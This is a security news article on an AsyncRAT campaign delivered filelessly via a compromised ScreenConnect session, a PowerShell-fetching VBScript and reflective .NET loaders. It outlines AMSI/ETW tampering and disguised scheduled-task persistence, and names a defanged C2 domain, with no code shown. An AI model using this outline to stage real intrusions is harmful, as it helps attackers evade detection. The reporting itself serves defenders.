Security researchers have discovered an open-source remote access trojan, AsyncRAT, being delivered through a multi-stage, in-memory loader as adversaries move to fileless techniques.
According to LevelBlue Labs’ findings, attackers gained initial foothold through a compromised ScreenConnect client and ran PowerShell scripts to fetch two-staged payloads.
“This technique exemplifies fileless malware: no executable is written to disk, and all malicious logic is executed in-memory,” Sean Shirley, a network security engineer at LevelBlue, explained in a blog post. “The approach bypasses traditional disk-based detection by operating in memory, making these threats harder to detect, analyze, and eradicate.”
The analysis revealed a minimalist fileless attack, utilizing trusted admin tooling, tiny bootstrap scripts, and .NET loaders, designed to evade signature-based detection while delivering full remote control capability.
Legitimate tools abused for fileless staging
LevelBlue’s timeline ties the initial compromise to a ConnectWise ScreenConnect deployment used as a relay/C2 endpoint.
“The threat actor initiated an interactive session through relay.shipperzone[.]online, a known malicious domain linked to unauthorized ScreenConnect deployments,” Shirley noted. “From this session, a VBScript (Update.vbs) was executed using WScript, triggering a PowerShell command designed to fetch two external payloads.”
Rather than dropping heavy binaries, the operators used small, seemingly harmless code — a VBScript for PowerShell commands — to fetch and assemble two staged .NET payloads in memory. The first-stage assembly acts as an obfuscator/loader, converting downloaded content into byte arrays and using reflection to invoke a secondary assembly’s Main() directly.
This keeps the filesystem clean and leaves antivirus scanners looking for the wrong signals.
RAT with evasion and persistence
Once AsyncRAT was loaded, the attackers took steps to disrupt Windows defenses. The report notes techniques such as disabling Anti-malware Scan Interface (AMSI) and tampering with Event Tracking for Windows (ETW), both critical features for runtime detection. To maintain persistence, they created a scheduled task disguised as “Skype Update,” ensuring the RAT would restart after reboots.
LevelBlue’s analysis also uncovered AsyncRAT’s encrypted configuration file, secured with AES-256, which contained instructions to connect back to a DuckDNS-based command and control (C2) server. The C2 communication used custom packet formats over TCP, a method typically used for flexibility and evasion.
AsyncRAT grants operators access to powerful features: keystroke logging, browser credential theft, clipboard monitoring, and system surveillance. LevelBlue published a list of indicators of compromise (IoC) for defenders to add to their scanners. Additional general best practices may include blocking malicious domains, hunting for PowerShell one-liners and in-memory .NET reflective loads, monitoring for AMSI/ETW tampering, and suspicious scheduled task creation.
Threat actors are increasingly leaning toward fileless intrusions, drawn by their quiet execution and reliable results. Earlier this year, attackers were caught using a similar technique, phishing a malicious VBScript that ultimately delivered the popular Remcos RAT in-memory on victim machines.
No Responses